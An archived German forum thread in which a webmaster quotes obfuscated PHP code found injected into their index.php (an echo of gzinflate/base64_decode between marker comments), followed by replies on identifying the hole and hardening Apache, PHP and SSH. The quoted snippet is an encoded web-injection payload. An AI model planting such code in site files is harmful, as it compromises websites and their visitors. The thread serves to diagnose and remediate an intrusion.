Zum Inhalt springen
View in the app

A better way to browse. Learn more.
Fachinformatiker.de

A full-screen app on your home screen with push notifications, badges and more.

To install this app on iOS and iPadOS
  1. Tap the Share icon in Safari
  2. Scroll the menu and tap Add to Home Screen.
  3. Tap Add in the top-right corner.
To install this app on Android
  1. Tap the 3-dot menu (⋮) in the top-right corner of the browser.
  2. Tap Add to Home screen or Install app.
  3. Confirm by tapping Install.

PHP Sicherheitslücken schließen (ALLE!)

errox
in Skript- und Webserverprogrammierung

Empfohlene Antworten

Veröffentlicht

Hallo Liebe leute.

Irgendjemand hat es irgendwie geschafft das in meine index.php einzutragen:

#c3284d#

echo(gzinflate(base64_decode("lZExT8MwEIX/iuWltlSSsCZNpVKxIVjYEIMTn5OTHNuyL2kjyn8nUSsWYGC703uf7t7dLrURA+0nFdkYbc17olDmuXcWHdwpayFlDohXaIRwasJOkY/ZmCAeOnCUkX/yJ4hHlUDIDJ2G84sRfEgIXO7rQl4u/+EMRjD+fEXlx7qXqbVvx2GF2giK4NHC2okNmqgG2MjKZAnoQBSxGQkEP6Gmnm/5Pf+p9YBdT3+IKbZ8uxziF4VmCws1YcIGLdJcsh61Blex4BMSelcy1SRvF3/FLBgqWRGoYuTDtVoGfkfpgG450sP8qrrnJYngjdczl2/Fe6ZCAKePPVotjPzc5bdPfQE=")));

#/c3284d#

Die frage: WIE?!

Was gibt es alles für sicherheitslücken (Einige hab ich geschlossen, aber wie es aussieht nicht alle)

Da schaust du am besten mal hier nach.

Ist das ein Root oder V-Root-Server oder hast du nur den Webspace?

Was für ein Betriebssystem ist dies?

Welche Apache Version läuft?

Welche PHP-Version läuft?

Wurde es als Modul oder als CGI implementiert?

Sind sonst noch Module installiert?

WElche Sicherheitslücken hast du bereits geschlossen?

Mit den von dir bisher gelieferten Informationen kann dir wirklich niemand helfen. (Vor allem, da die Bugs doch sehr oft versionsabhängig sind.)

Ich gehe einfach mal von einem Root-Server oder V-Root-Server aus, denn ansonsten würdest du an der Absicherung von PHP ja eh nciht viel machen können.

Am besten du schaust erst einmal auf die Apache-Seite und installierst von dort die aktuellste stable Version und liest die Release Notes (dort steht oftmals schon etwas über Sicherheitslücken drin, bzw. wo du eine Liste findest).

Als nächsten Schritt einfach mal auf der PHP-Seite, installierst dir die aktuellste stable Version und schaust hier, was für Bugs es darin noch gibt und ob es entsprechende Bugfixes dafür gibt. Es gibt nun einmal nicht für alle Bugs auch automatisch Bugfixes, bzw. dies kann manchmal etwas dauern und in der Zwischenzeit soll man dann (falls möglich) bestimmte sicherheitsrelevante Funktionen ausschalten.

Dazu gibt es noch diverse HowTos (Distributionsabhängig!), wie man seinen Server generell absichert. Denn ob das überhaupt per PHP-Bug dort reingekommen ist, oder auf anderem Wege, wirst du sicherlich nicht wissen.

Wenn erst einmal jemand da war, heisst es eh erst einmal, das System (mit neuen Passwörtern und SSH-Keys) komplett neu aufsetzen und dann absichern...

Eine Absicherung ist z.B., dass man den Zugang des USers "root" nicht per SSH erlauben sollte, sondern sudo nutzen sollte (oder sich halt dann als su identifizieren und mit dem user dann arbeiten). Dazu noch den SSH-Port auf einen anderen Port (> 1024) legen. Ob man den Zugang nur per Zertifikat oder auch mit Username und passwort erlaubt ist dann noch die Frage. Hat beides seine Daseinsberechtigung in meinen Augen - sicherer ist es aber definitiv mit Zertifikat und auch nicht wirklich umständlicher, wenn man es eh nur von zu Hause oder vom Laptop oder Smartphone aus nutzen möchte.

Bearbeitet von Crash2001

Archiv

Dieses Thema wurde archiviert und kann nicht mehr beantwortet werden.

Zur Themenliste gehen

Configure browser push notifications
Chrome (Android)
  1. Tap the lock icon next to the address bar.
  2. Tap Permissions → Notifications.
  3. Adjust your preference.
Chrome (Desktop)
  1. Click the padlock icon in the address bar.
  2. Select Site settings.
  3. Find Notifications and adjust your preference.